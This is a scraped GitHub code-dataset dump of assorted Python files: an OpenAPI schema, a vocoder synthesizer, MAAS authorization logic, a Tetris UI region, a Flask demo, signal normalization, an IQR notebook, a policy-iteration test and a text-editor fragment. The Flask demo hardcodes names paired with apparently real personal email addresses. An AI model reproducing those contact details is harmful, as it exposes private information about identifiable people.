{\"type\": \"string\"}},\n \"required\": [\"name\", \"petType\"],\n },\n {\n \"description\": \"A representation of a cat. \"\n \"Note that `Cat` will be used as the discriminator value.\",\n \"allOf\": [\n {\"$ref\": \"#/components/schemas/Pet\"},\n {\n \"type\": \"object\",\n \"properties\": {\n \"huntingSkill\": {\n \"type\": \"string\",\n \"description\": \"The measured skill for hunting\",\n \"default\": \"lazy\",\n \"enum\": [\"clueless\", \"lazy\", \"adventurous\", \"aggressive\"],\n }\n },\n \"required\": [\"huntingSkill\"],\n },\n ],\n },\n {\n \"description\": \"A representation of a dog. \"\n \"Note that `Dog` will be used as the discriminator value.\",\n \"allOf\": [\n {\"$ref\": \"#/components/schemas/Pet\"},\n {\n \"type\": \"object\",\n \"properties\": {\n \"packSize\": {\n \"type\": \"integer\",\n \"format\": \"int32\",\n \"description\": \"the size of the pack the dog is from\",\n \"default\": 0,\n \"minimum\": 0,\n }\n },\n \"required\": [\"packSize\"],\n },\n ],\n },\n ]\n }\n","repo_name":"kuimono/openapi-schema-pydantic","sub_path":"openapi_schema_pydantic/v3/v3_0_3/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":21555,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"69"}
+{"seq_id":"24651603006","text":"# 3rd-party imports\nimport numpy as np\nfrom scipy.interpolate import interp1d\nfrom scipy.signal import hanning\nfrom scipy.fftpack import fft, ifft\nimport numba\nimport matplotlib.pyplot as plt\n\n# build-in imports\nfrom decimal import Decimal, ROUND_HALF_UP\n\ndef synthesisRequiem(source_object, filter_object, seeds_signals):\n excitation_signal = get_excitation_signal(source_object['temporal_positions'],\n filter_object['fs'],\n source_object['f0'],\n source_object['vuv'],\n seeds_signals['pulse'],\n seeds_signals['noise'],\n source_object['aperiodicity'])\n y = get_waveform(excitation_signal,\n filter_object['spectrogram'],\n source_object['temporal_positions'],\n source_object['f0'],\n filter_object['fs'])\n return y\n\ndef get_excitation_signal(temporal_positions,\n fs,\n f0,\n vuv,\n pulse_seed,\n noise_seed,\n band_aperiodicity):\n\n fft_size = pulse_seed.shape[0]\n base_index = np.arange(-fft_size // 2 + 1, fft_size // 2 + 1)\n number_of_aperiodicities = pulse_seed.shape[1]\n\n time_axis = np.arange(temporal_positions[0], temporal_positions[-1] + 1 / fs, 1 / fs)\n periodic_component = np.zeros(len(time_axis))\n aperiodic_component = np.zeros(len(time_axis))\n\n pulse_locations_index, interpolated_vuv = time_base_generation(temporal_positions, f0, fs, vuv, time_axis)\n\n # band-aperiodicity is resampled at sampling frequency of fs Hz\n interpolated_aperiodicity = aperiodicity_generation(temporal_positions, band_aperiodicity, time_axis)\n\n # generation of the aperiodic component\n for i in range(number_of_aperiodicities):\n noise = generate_noise(len(aperiodic_component), noise_seed, i)\n aperiodic_component += (noise * interpolated_aperiodicity[i, :len(aperiodic_component)])\n\n # generation of the periodic component\n for i in range(len(pulse_locations_index)):\n if (interpolated_vuv[pulse_locations_index[i]-1] <= 0.5) or (interpolated_aperiodicity[0, pulse_locations_index[i]-1] > 0.999):\n continue\n noise_size = pulse_locations_index[min(len(pulse_locations_index) - 1, i + 1)] - pulse_locations_index[i]\n noise_size = np.sqrt(max(1, noise_size))\n output_buffer_index = np.maximum(1, np.minimum(len(time_axis), pulse_locations_index[i] + base_index))\n response = get_one_periodic_excitation(number_of_aperiodicities, pulse_seed, interpolated_aperiodicity[:, pulse_locations_index[i]-1], noise_size)\n periodic_component[output_buffer_index.astype(int)-1] += response\n excitation_signal = periodic_component + aperiodic_component\n return excitation_signal\n\n\ndef get_one_periodic_excitation(number_of_aperiodicities, pulse_seed, aperiodicity, noise_size):\n response = np.zeros(len(pulse_seed[:,0]))\n for i in range(number_of_aperiodicities):\n response += pulse_seed[:,i] * (1 - aperiodicity[i])\n response *= noise_size\n return response\n\n\ndef get_waveform(excitation_signal, spectrogram, temporal_positions, f0, fs):\n y = np.zeros(len(excitation_signal))\n fft_size = (spectrogram.shape[0] - 1) * 2\n latter_index = np.arange(int(fft_size // 2 + 1), fft_size+1)\n frame_period_sample = int((temporal_positions[1] - temporal_positions[0]) * fs)\n win_len = frame_period_sample * 2 - 1\n half_win_len = frame_period_sample - 1\n win = hanning(win_len+2)[1:-1]\n\n for i in range(2, len(f0)-1):\n origin = (i - 1) * frame_period_sample - half_win_len\n safe_index = np.minimum(len(y), np.arange(origin, origin + win_len))\n\n tmp = excitation_signal[safe_index-1] * win\n spec = spectrogram[:,i-1]\n periodic_spectrum = np.r_[spec, spec[-2:0:-1]]\n\n tmp_cepstrum = np.fft.fft(np.log(np.abs(periodic_spectrum)) / 2).real\n tmp_complex_cepstrum = np.zeros(fft_size)\n tmp_complex_cepstrum[latter_index.astype(int) - 1] = tmp_cepstrum[latter_index.astype(int) - 1] * 2\n tmp_complex_cepstrum[0] = tmp_cepstrum[0]\n\n spectrum = np.exp(np.fft.ifft(tmp_complex_cepstrum))\n response = ifft(spectrum * fft(tmp, fft_size)).real\n\n safe_index = np.minimum(len(y), np.arange(origin, origin+fft_size))\n y[safe_index-1] += response\n return y\n\n\ndef time_base_generation(temporal_positions, f0, fs, vuv, time_axis):\n f0_interpolated_raw = interp1d(temporal_positions, f0, kind='linear', fill_value='extrapolate')(time_axis)\n vuv_interpolated = interp1d(temporal_positions, vuv, kind='linear', fill_value='extrapolate')(time_axis)\n vuv_interpolated = vuv_interpolated > 0.5\n\n f0_interpolated = f0_interpolated_raw * vuv_interpolated\n default_f0 = 500\n f0_interpolated[f0_interpolated == 0] = f0_interpolated[f0_interpolated == 0] + default_f0\n\n total_phase = np.cumsum(2 * np.pi * f0_interpolated / fs)\n wrap_phase = np.remainder(total_phase, 2 * np.pi)\n pulse_locations = (time_axis[:-1])[np.abs(np.diff(wrap_phase)) > np.pi]\n pulse_locations_index = np.array([int(Decimal(elm * fs).quantize(0, ROUND_HALF_UP)) for elm in pulse_locations]) + 1\n\n return pulse_locations_index, vuv_interpolated\n\ndef aperiodicity_generation(temporal_positions, band_aperiodicity, time_axis):\n number_of_aperiodicities = band_aperiodicity.shape[0]\n multi_aperiodicity = np.zeros((number_of_aperiodicities, len(time_axis)))\n\n for i in range(number_of_aperiodicities):\n multi_aperiodicity[i,:] = interp1d(temporal_positions, 10 ** (band_aperiodicity[i, :] / 10),\n kind='linear', fill_value='extrapolate')(time_axis)\n\n return multi_aperiodicity\n\n\ndef generate_noise(N, noise_seed, frequency_band):\n # current_index is a persistent variable of the function\n if np.all(generate_noise.current_index == None):\n generate_noise.current_index = np.zeros(noise_seed.shape[1])\n noise_length = noise_seed.shape[0]\n\n index = np.remainder(np.arange(generate_noise.current_index[frequency_band], generate_noise.current_index[frequency_band]+N), noise_length).astype(int)\n n = noise_seed[index, frequency_band]\n generate_noise.current_index[frequency_band] = index[-1]\n return n\ngenerate_noise.current_index = None\n\n#####################################################################################################\n@numba.jit((numba.float64[:],), nopython=True, cache=True)\ndef round_matlab(x: np.ndarray) -> np.ndarray:\n '''\n round function works as matlab round\n :param x: input vector\n :return: rounded vector\n '''\n #return int(Decimal(n).quantize(0, ROUND_HALF_UP))\n y = x.copy()\n y[x > 0] += 0.5\n y[x <= 0] -= 0.5\n return y\n","repo_name":"tuanad121/Python-WORLD","sub_path":"world/synthesisRequiem.py","file_name":"synthesisRequiem.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","stars":140,"dataset":"github-code","pt":"69"}
+{"seq_id":"40304874277","text":"from django.contrib.auth.backends import ModelBackend\nfrom django.contrib.auth.models import User\n\nfrom maasserver.enum import NODE_TYPE\nfrom maasserver.models.blockdevice import BlockDevice\nfrom maasserver.models.bmc import Pod\nfrom maasserver.models.discovery import Discovery\nfrom maasserver.models.dnsdata import DNSData\nfrom maasserver.models.dnsresource import DNSResource\nfrom maasserver.models.domain import Domain\nfrom maasserver.models.fabric import Fabric\nfrom maasserver.models.filesystemgroup import FilesystemGroup\nfrom maasserver.models.interface import Interface\nfrom maasserver.models.node import Node\nfrom maasserver.models.resourcepool import ResourcePool\nfrom maasserver.models.space import Space\nfrom maasserver.models.staticroute import StaticRoute\nfrom maasserver.models.subnet import Subnet\nfrom maasserver.models.tag import Tag\nfrom maasserver.models.vlan import VLAN\nfrom maasserver.models.vmcluster import VMCluster\nfrom maasserver.permissions import (\n NodePermission,\n PodPermission,\n ResourcePoolPermission,\n VMClusterPermission,\n)\nfrom provisioningserver.utils import is_instance_or_subclass\n\n# Some actions are applied to model object types global to MAAS; not\n# necessarily a particular object. The following objects cannot be created or\n# changed by non-administrative users, but superusers can always create, read\n# write, or delete them.\nUNRESTRICTED_READ_MODELS = (\n DNSData,\n DNSResource,\n Domain,\n Fabric,\n ResourcePool,\n Space,\n Subnet,\n Tag,\n StaticRoute,\n VLAN,\n)\n\n# The following model objects are restricted from non-administrative users.\n# They cannot be seen (or created, or modified, or deleted) by \"normal\" users.\nADMIN_RESTRICTED_MODELS = (Discovery,)\n\n# ADMIN_PERMISSIONS applies to the model objects in ADMIN_RESTRICTED_MODELS.\n# These model objects are restricted to administrators only; permission checks\n# will return True for administrators given any of the following permissions:\nADMIN_PERMISSIONS = (\n NodePermission.view,\n NodePermission.edit,\n NodePermission.admin,\n NodePermission.admin_read,\n)\n\n\nclass MAASAuthorizationBackend(ModelBackend):\n supports_object_permissions = True\n\n def authenticate(self, request, username=None, password=None, **kwargs):\n external_auth_info = getattr(request, \"external_auth_info\", None)\n # use getattr so that tests that don't include the middleware don't\n # explode\n if external_auth_info:\n # Don't allow username/password logins with external authentication\n return\n authenticated = super().authenticate(\n request, username=username, password=password, **kwargs\n )\n if authenticated:\n user = User.objects.get(username=username)\n if not user.userprofile.is_local:\n return\n return authenticated\n\n def has_perm(self, user, perm, obj=None):\n self._sanity_checks(perm, obj=obj)\n if not user.is_active:\n # Deactivated users, and in particular the node-init user,\n # are prohibited from accessing maasserver services.\n return False\n\n from maasserver.rbac import rbac\n\n rbac_enabled = rbac.is_enabled()\n visible_pools, view_all_pools = [], []\n deploy_pools, admin_pools = [], []\n if rbac_enabled:\n fetched_pools = rbac.get_resource_pool_ids(\n user.username,\n \"view\",\n \"view-all\",\n \"deploy-machines\",\n \"admin-machines\",\n )\n visible_pools = fetched_pools[\"view\"]\n view_all_pools = fetched_pools[\"view-all\"]\n deploy_pools = fetched_pools[\"deploy-machines\"]\n admin_pools = fetched_pools[\"admin-machines\"]\n\n # Handle node permissions without objects.\n if perm == NodePermission.admin and obj is None:\n # User wants to admin writes to all nodes (aka. create a node),\n # must be superuser for those permissions.\n return user.is_superuser\n elif perm == NodePermission.view and obj is None:\n # XXX 2018-11-20 blake_r: View permission without an obj is used\n # for device create as a standard user. Currently there is no\n # specific DevicePermission and no way for this code path to know\n # its for a device. So it is represented using this path.\n #\n # View is only used for the create action, modifying a created\n # device uses the appropriate `NodePermission.edit` scoped to the\n # device being editted.\n if rbac_enabled:\n # User must either be global admin or have access to deploy\n # or admin some machines.\n return user.is_superuser or (\n len(deploy_pools) > 0 or len(admin_pools) > 0\n )\n return True\n\n # ResourcePool permissions are handled specifically.\n if isinstance(perm, ResourcePoolPermission):\n return self._perm_resource_pool(\n user, perm, rbac, visible_pools, obj\n )\n\n # Pod permissions are handled specifically.\n if isinstance(perm, PodPermission):\n return self._perm_pod(\n user,\n perm,\n rbac,\n visible_pools,\n view_all_pools,\n deploy_pools,\n admin_pools,\n obj,\n )\n\n if isinstance(perm, VMClusterPermission):\n return self._perm_vmcluster(\n user,\n perm,\n rbac,\n visible_pools,\n view_all_pools,\n admin_pools,\n obj,\n )\n\n if isinstance(obj, (Node, BlockDevice, FilesystemGroup)):\n if isinstance(obj, BlockDevice):\n obj = obj.get_node()\n elif isinstance(obj, FilesystemGroup):\n obj = obj.get_node()\n if perm == NodePermission.view:\n return self._can_view(\n rbac_enabled,\n user,\n obj,\n visible_pools,\n view_all_pools,\n deploy_pools,\n admin_pools,\n )\n elif perm == NodePermission.edit:\n can_edit = self._can_edit(\n rbac_enabled, user, obj, deploy_pools, admin_pools\n )\n return not obj.locked and can_edit\n elif perm == NodePermission.lock:\n # only machines can be locked\n can_edit = self._can_edit(\n rbac_enabled, user, obj, deploy_pools, admin_pools\n )\n return obj.pool_id is not None and can_edit\n elif perm == NodePermission.admin_read:\n return self._can_admin(rbac_enabled, user, obj, admin_pools)\n elif perm == NodePermission.admin:\n return not obj.locked and self._can_admin(\n rbac_enabled, user, obj, admin_pools\n )\n else:\n raise NotImplementedError(\n \"Invalid permission check (invalid permission name: %s).\"\n % perm\n )\n elif isinstance(obj, Interface):\n node = obj.get_node()\n if node is None:\n # Doesn't matter the permission level if the interface doesn't\n # have a node, the user must be a global admin.\n return user.is_superuser\n if perm == NodePermission.view:\n return self._can_view(\n rbac_enabled,\n user,\n node,\n visible_pools,\n view_all_pools,\n deploy_pools,\n admin_pools,\n )\n elif perm == NodePermission.edit:\n # Machine interface can only be modified by an administrator\n # of the machine. Even the owner of the machine cannot modify\n # the interfaces on that machine, unless they have\n # administrator rights.\n if node.node_type == NODE_TYPE.MACHINE:\n return self._can_admin(\n rbac_enabled, user, node, admin_pools\n )\n # Other node types must be editable by the user.\n return self._can_edit(\n rbac_enabled, user, node, deploy_pools, admin_pools\n )\n elif perm == NodePermission.admin:\n # Admin permission is solely granted to superusers.\n return self._can_admin(rbac_enabled, user, node, admin_pools)\n else:\n raise NotImplementedError(\n \"Invalid permission check (invalid permission name: %s).\"\n % perm\n )\n elif is_instance_or_subclass(obj, UNRESTRICTED_READ_MODELS):\n # This model is classified under 'unrestricted read' for any\n # logged-in user; so everyone can view, but only an admin can\n # do anything else.\n if perm == NodePermission.view:\n return True\n elif perm in ADMIN_PERMISSIONS:\n # Admin permission is solely granted to superusers.\n return user.is_superuser\n else:\n raise NotImplementedError(\n \"Invalid permission check (invalid permission name: %s).\"\n % perm\n )\n elif is_instance_or_subclass(obj, ADMIN_RESTRICTED_MODELS):\n # Only administrators are allowed to read/write these objects.\n if perm in ADMIN_PERMISSIONS:\n return user.is_superuser\n else:\n raise NotImplementedError(\n \"Invalid permission check (invalid permission name: %s).\"\n % perm\n )\n else:\n raise NotImplementedError(\n \"Invalid permission check (invalid object type).\"\n )\n\n def _sanity_checks(self, perm, obj=None):\n \"\"\"Perform sanity checks to ensure that the perm matches the object.\"\"\"\n # Sanity check that a `ResourcePool` is being checked against\n # `ResourcePoolPermission`.\n if (\n obj is not None\n and isinstance(obj, ResourcePool)\n and not isinstance(perm, ResourcePoolPermission)\n ):\n raise TypeError(\n \"obj type of ResourcePool must be checked \"\n \"against a `ResourcePoolPermission`.\"\n )\n\n # Sanity check that a `Pod` is being checked against `PodPermission`.\n if (\n obj is not None\n and isinstance(obj, Pod)\n and not isinstance(perm, PodPermission)\n ):\n raise TypeError(\n \"obj type of Pod must be checked against a `PodPermission`.\"\n )\n\n def _can_view(\n self,\n rbac_enabled,\n user,\n machine,\n visible_pools,\n view_all_pools,\n deploy_pools,\n admin_pools,\n ):\n if machine.pool_id is None:\n # Only machines are filtered for view access.\n return True\n if rbac_enabled:\n # Machine not owned by the user must be in the view_all_pools or\n # admin_pools for the user to be able to view the machine.\n if machine.owner_id is not None and machine.owner_id != user.id:\n return (\n machine.pool_id in view_all_pools\n or machine.pool_id in admin_pools\n )\n # Machine is not owned or owned by the user so must be in either\n # pool for the user to view it.\n return (\n machine.pool_id in visible_pools\n or machine.pool_id in view_all_pools\n or machine.pool_id in deploy_pools\n or machine.pool_id in admin_pools\n )\n return (\n machine.owner_id is None\n or machine.owner_id == user.id\n or user.is_superuser\n )\n\n def _can_edit(\n self, rbac_enabled, user, machine, deploy_pools, admin_pools\n ):\n editable = machine.owner_id is None or machine.owner_id == user.id\n if rbac_enabled:\n can_admin = self._can_admin(\n rbac_enabled, user, machine, admin_pools\n )\n can_edit = (\n machine.pool_id in deploy_pools\n or (machine.pool_id is None and machine.owner == user)\n or can_admin\n )\n return (editable and can_edit) or can_admin\n return editable or user.is_superuser\n\n def _can_admin(self, rbac_enabled, user, machine, admin_pools):\n if machine.pool_id is None:\n # Not a machine to be admin on this must have global admin.\n return user.is_superuser\n if rbac_enabled:\n return machine.pool_id in admin_pools\n return user.is_superuser\n\n def _perm_resource_pool(self, user, perm, rbac, visible_pools, obj=None):\n # `create` permissions is called without an `obj`.\n rbac_enabled = rbac.is_enabled()\n if perm == ResourcePoolPermission.create:\n if rbac_enabled:\n return rbac.can_create_resource_pool(user.username)\n return user.is_superuser\n if perm == ResourcePoolPermission.delete:\n if rbac_enabled:\n return rbac.can_delete_resource_pool(user.username)\n return user.is_superuser\n\n # From this point forward the `obj` must be a `ResourcePool`.\n if not isinstance(obj, ResourcePool):\n raise ValueError(\n \"only `ResourcePoolPermission.(create|delete)` can be used \"\n \"without an `obj`.\"\n )\n\n if perm == ResourcePoolPermission.edit:\n if rbac_enabled:\n return (\n obj.id\n in rbac.get_resource_pool_ids(user.username, \"edit\")[\n \"edit\"\n ]\n )\n return user.is_superuser\n elif perm == ResourcePoolPermission.view:\n if rbac_enabled:\n return obj.id in visible_pools\n return True\n\n raise ValueError(\"unknown ResourcePoolPermission value: %s\" % perm)\n\n def _perm_pod(\n self,\n user,\n perm,\n rbac,\n visible_pools,\n view_all_pools,\n deploy_pools,\n admin_pools,\n obj=None,\n ):\n # `create` permissions is called without an `obj`.\n rbac_enabled = rbac.is_enabled()\n if perm == PodPermission.create:\n return user.is_superuser\n\n # From this point forward the `obj` must be a `ResourcePool`.\n if not isinstance(obj, Pod):\n raise ValueError(\n \"only `PodPermission.create` can be used without an `obj`.\"\n )\n\n if perm == PodPermission.edit:\n if rbac_enabled:\n return obj.pool_id in admin_pools\n return user.is_superuser\n elif perm == PodPermission.compose:\n if rbac_enabled:\n return obj.pool_id in admin_pools\n return user.is_superuser\n elif perm == PodPermission.dynamic_compose:\n if rbac_enabled:\n return (\n obj.pool_id in deploy_pools or obj.pool_id in admin_pools\n )\n return True\n elif perm == PodPermission.view:\n if rbac_enabled:\n return (\n obj.pool_id in visible_pools\n or obj.pool_id in view_all_pools\n )\n return True\n\n raise ValueError(\"unknown PodPermission value: %s\" % perm)\n\n def _perm_vmcluster(\n self,\n user,\n perm,\n rbac,\n visible_pools,\n view_all_pools,\n admin_pools,\n obj=None,\n ):\n rbac_enabled = rbac.is_enabled()\n if not isinstance(obj, VMCluster):\n raise ValueError(\n \"`VMClusterPermission` requires an `obj` of type `VMCluster`\"\n )\n\n if perm == VMClusterPermission.view:\n if rbac_enabled:\n return (\n obj.pool_id in visible_pools\n or obj.pool_id in view_all_pools\n )\n return True\n\n if perm == VMClusterPermission.edit:\n if rbac_enabled:\n return obj.pool_id in admin_pools\n return user.is_superuser\n\n if perm == VMClusterPermission.delete:\n if rbac_enabled:\n return obj.pool_id in admin_pools\n return user.is_superuser\n\n raise ValueError(\"unknown VMClusterPermission value: %s\" % perm)\n","repo_name":"AmroseGirdhar/tyrone","sub_path":"src/maasserver/auth/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":17090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30584997822","text":"# -*- coding: utf-8 -*-\n\nfrom src.constants.graphics import QUEUE_SQUARE_SIZE_PIXELS, QUEUE_FONT_SIZE, QUEUE_SURFACE_HEIGHT\nfrom src.constants.random_bag import QUEUE_LENGTH\nfrom src.graphics.regions.region import Region\nfrom src.graphics import utils\n\n\nclass QueueRegion(Region):\n \"\"\"Class QueueRegion. Class representing the region of the game screen where\n the next pieces are displayed.\"\"\"\n \n def __init__(self):\n \"\"\"Overload of constructor for QueueRegion class.\"\"\"\n Region.__init__(self)\n self._text = utils.draw_text(\"Next Pieces\", QUEUE_FONT_SIZE)\n \n \n def _update_kwargs_test(self, kwargs, keys_list):\n \"\"\"Performs the test by Region._update_kwargs_test and additionally checks\n the size of the list in parameter is correct.\"\"\"\n Region._update_kwargs_test(self, kwargs, keys_list)\n if len(kwargs[\"queue\"]) != QUEUE_LENGTH:\n raise TypeError(\"{}.update() parameter queue has size {}, {} expected\".format(self.__class__.__name__, len(kwargs[\"queue\"]), QUEUE_LENGTH))\n \n \n def update(self, **kwargs):\n \"\"\"Implementation of the update method for the QueueRegion.\"\"\"\n self._update_kwargs_test(kwargs, [\"queue\"])\n \n queue = kwargs[\"queue\"]\n \n pieces = [utils.draw_outside_tetrimino(piece, QUEUE_SQUARE_SIZE_PIXELS) for piece in queue]\n self._surface = utils.merge_surfaces_vertically([self._text, *pieces], total_height = QUEUE_SURFACE_HEIGHT)","repo_name":"Andrea-Oliveri/Tetris","sub_path":"src/graphics/regions/queue_region.py","file_name":"queue_region.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36673686322","text":"import json\nfrom operator import itemgetter\nfrom flask import jsonify\n\ndata = [\n {\n \"id\": 1,\n \"name\": \"Evans Forson\",\n \"email\": \"ataforson@gmail.com\"\n },\n {\n \"id\": 2,\n \"name\": \"Georg Udosen\",\n \"email\": \"datameshprojects@gmail.com\"\n },\n {\n \"id\": 3,\n \"name\": \"Fon Nkwenti\",\n \"email\": \"fonnkwenti85@gmail.com\"\n },\n {\n \"id\": 4,\n \"name\": \"Franklin Tallah\",\n \"email\": \"ftallah@gmail.com\"\n },\n {\n \"id\": 5,\n \"name\": \"Gabriel Sallah\",\n \"email\": \"gabriel.sallah@gmail.com\"\n },\n {\n \"id\": 6,\n \"name\": \"Seyram Komla Sapaty\",\n \"email\": \"komlasapaty@gmail.com\"\n },\n {\n \"id\": 7,\n \"name\": \"Nbanjika\",\n \"email\": \"nbanjika@gmail.com\"\n }\n]\n\n\ndef get_all(self):\n \"\"\"Responds to any HTTP request.\n Args:\n request (flask.Request): HTTP request object.\n Returns:\n The response text or any set of values that can be turned into a\n Response object using\n `make_response `.\n \"\"\"\n return jsonify(data)\n\n\ndef get_names(self):\n persons = json.loads(json.dumps(data)) \n v = {p for p in [person['name'] for person in persons]}\n final = {\"Name\": list(v)}\n if final:\n return jsonify(final) \n else:\n return \"No records!\"\n \n\n\ndef get_name(request):\n if request.args and 'id' in request.args:\n person_id = request.args.get('id')\n if int(person_id) > 1 or int(person_id) < len(data):\n p = [i for i in sorted(data, key=itemgetter('id')) if i[\"id\"] == int(person_id)]\n if p:\n return jsonify(p)\n else:\n return 'No such record found!'\n else:\n return \"No such record found!\"\n else:\n return \"Please pass an id query string value!\"\n","repo_name":"udoyen/study-jam-week-10","sub_path":"functions/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17637013624","text":"'''\r\n\t一个样本中6个侧面数据归一化后的结果\r\n'''\r\nimport os\r\nimport pandas as pd \r\nimport numpy as np\r\nimport math\r\n\r\ndef norm_onefile(arr):\r\n\tlist=[]\r\n\ti=0\r\n\twhile i<6:\t\t\t\t\t\t\t\t\t\t#取文件中的每一列数据\r\n\t\tarr_column=np.array(arr[:,i])\r\n\t\t#print(arr_column)\r\n\r\n\t\tstart,end=0,32\t\t\t\t\t\t\t\t\t#每列数据分成150个周期,每周期有32个数据\r\n\t\tvalue_list=[]\r\n\t\twhile end<=4800:\r\n\t\t #arr_cycle=arr_column[start:end])\t\t\t#取每列的每周期的数据\r\n\t\t value_max=max(arr_column[start:end])\t\t#取每周期中的最大值(最高点)\r\n\t\t value_min=min(arr_column[start:end])\t\t#取每周期中的最小值(最低点)\r\n\t\t value=(value_max+abs(value_min))/2\t\t\t\r\n\t\t value=float('%.3f' % value)\r\n\t\t value_list.append(value)\t\t\t\t\t#将每个周期的计算值存到列表value_list中\r\n\r\n\t\t start+=32\r\n\t\t end+=32 \r\n\r\n\t\tnorm=(math.fsum(value_list))/150\t\t\t\t#代入公式,求归一化系数norm\r\n\t\tnorm=float('%.3f' % norm)\t\t\t\t\t\t\r\n\t\t#print(\"第1个样本数据的第{}个侧面数据的归一化系数为:\\n{}\".format(i+1,norm))\r\n\t\tlist.append(norm)\r\n\t\tarr_column1=arr_column/norm\t\t\t\t\t\t#对每一列数据进行归一化处理\r\n\t\tarr_column1=np.around(arr_column1,decimals=3)\t\r\n\t\t# print(\"第1个样本数据的第{}个侧面数据的归一化系数为:{}\\n归一化结果为:\\n{}\".format(i+1,norm,arr_column1))\r\n\t\t# print()\r\n\t\ti+=1\r\n\treturn list\r\n\r\ndef main():\r\n\tarr = np.loadtxt('G:\\\\Desktop\\\\20150824190534Record.txt')\r\n\tlist = norm_onefile(arr)\r\n\tprint(list)\r\nif __name__ == '__main__':\r\n main()","repo_name":"julietxiao/WaveClassification","sub_path":"2_norm_onefile_allcoulumns.py","file_name":"2_norm_onefile_allcoulumns.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"22416237094","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # 5 Number Summary\n# 1. Minimum Value\n# 2. q1-25 Percentile\n# 3. Median\n# 4. q3-75 Percentile\n# 5 Maximum\n\n# In[2]:\n\n\nimport numpy as np\nimport pandas as pd\n\n\n# In[6]:\n\n\nl_marks=[45,32,56,75,88,1000,88,669,45,78,25,47,65.69,75]\nnp.percentile(l_marks,[25])\n\n\n# In[7]:\n\n\n##[Lower Fence ---> Higher Fence]\n\n\n# In[9]:\n\n\nq1=np.percentile(l_marks,[25])\nq1\n\n\n# In[11]:\n\n\nminimum,q1,q2,q3,max=np.quantile(l_marks,[0,0.25,0.50,0.75,1.0])\n\n\n# In[13]:\n\n\nmax\n\n\n# In[15]:\n\n\nIQR=q3-q1\n\n\n# In[16]:\n\n\nIQR\n\n\n# In[19]:\n\n\nlower_fence=q1-1.5*(IQR)\nhigher_fence=q1+1.5*(IQR)\n\n\n# In[20]:\n\n\nlower_fence\n\n\n# In[21]:\n\n\nhigher_fence\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"poojavats/Feature_Engineering","sub_path":"Handling Outlier.py","file_name":"Handling Outlier.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"789538307","text":"import unittest\nfrom PolicyIteration.policy_iteration import PolicyIteration\nfrom mdp.gridworld.grid_world_mdp import GridWorldMDP\nimport logging\nlogging.basicConfig(level=logging.INFO)\nclass TestPolicyIteration(unittest.TestCase):\n def test_evaluate_policy(self):\n mdp = GridWorldMDP(terminal_states=[(0,0),(3,3)])\n expected_policy = {(0, 1): {'UP': 1.0}, (1, 2): {'UP': 0.5, 'RIGHT': 0.5}, (3, 2): {'DOWN': 1.0}, (1, 3): {'RIGHT': 1.0}, (3, 0): {'DOWN': 0.5, 'LEFT': 0.5}, (3, 1): {'DOWN': 1.0}, (2, 1): {'DOWN': 0.5, 'LEFT': 0.5}, (2, 0): {'LEFT': 1.0}, (1, 1): {'UP': 0.5, 'LEFT': 0.5}, (2, 3): {'RIGHT': 1.0}, (2, 2): {'DOWN': 0.5, 'RIGHT': 0.5}, (1, 0): {'LEFT': 1.0}, (0, 2): {'UP': 1.0}, (0, 3): {'UP': 0.5, 'RIGHT': 0.5}}\n optimal_policy = PolicyIteration(mdp, max_iter=3,\n bellman_tolerance=0.01).find_optimal_policy()\n logging.info(\"Found Policy : %s\",optimal_policy)\n self.assertEqual(expected_policy, optimal_policy)\n\ndef main():\n unittest.main()\n\nif __name__ == \"__main__\":\n main()","repo_name":"swordofzeus/reinforcement-learning-library","sub_path":"tests/test_policy_iteration.py","file_name":"test_policy_iteration.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31592241349","text":"\"\"\"\nthis file manage the custom TextCtrl via add some functions to it to load file etc.\n\"\"\"\nimport wx\nimport os\nfrom .import backup\nimport globals as g\nimport shelve\nfrom settingsconfig import get, datapath\nfrom .Speak import speak\nfrom datetime import datetime\nfrom .import finder\nimport application\nfrom gui import text_viewer\n\nclass TextBox(wx.TextCtrl): #the custom class for the text box\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(style=wx.TE_MULTILINE+wx.HSCROLL+wx.TE_PROCESS_TAB, *args, **kwargs)\n\t\tself.__oldContent = self.Value\n\t\tself.loaded = False\n\t\tself.Bind(wx.EVT_TEXT, self.OnWrite) if int(get(\"autosave\"))==1 else None# bind the edit box to save any thing written to the backup file in the updata\n\t\tself.Bind(wx.EVT_KEY_DOWN, self.OnShortcuts)\n\n\t@property\n\tdef modified(self):\n\t\treturn self.__oldContent!=self.Value\n\n\t@modified.setter\n\tdef modified(self, value):\n\t\tif not value:\n\t\t\tself.__oldContent = self.Value\n\t\telse:\n\t\t\traise ValueError(\"error with set value\")\n\n\tdef GetInfo(self):\n\t\tif self.Value ==\"\": return speak(_(\"there is no text to get its info.\"))\n\t\twordsList = self.Value.split()\n\t\tcharacters = len(self.Value)\n\t\twords = len(wordsList)\n\t\tlines = self.NumberOfLines\n\t\tfrequentWord = max(wordsList, key=wordsList.count)\n\t\twordRepeted = wordsList.count(frequentWord)\n\t\turlCount = len(finder.FindUrls(self.Value))\n\t\temailsCount = len(finder.FindEmails(self.Value))\n\t\tif emailsCount>0:\n\t\t\temailsCount = _(\"emails count: {c}.\").format(c=emailsCount)\n\t\telse:\n\t\t\temailsCount=\"\"\n\t\tif urlCount>0:\n\t\t\turlCount = _(\"links count: {c}.\").format(c=urlCount)\n\t\telse:\n\t\t\turlCount=\"\"\n\t\tinfo =_(\"\"\"text 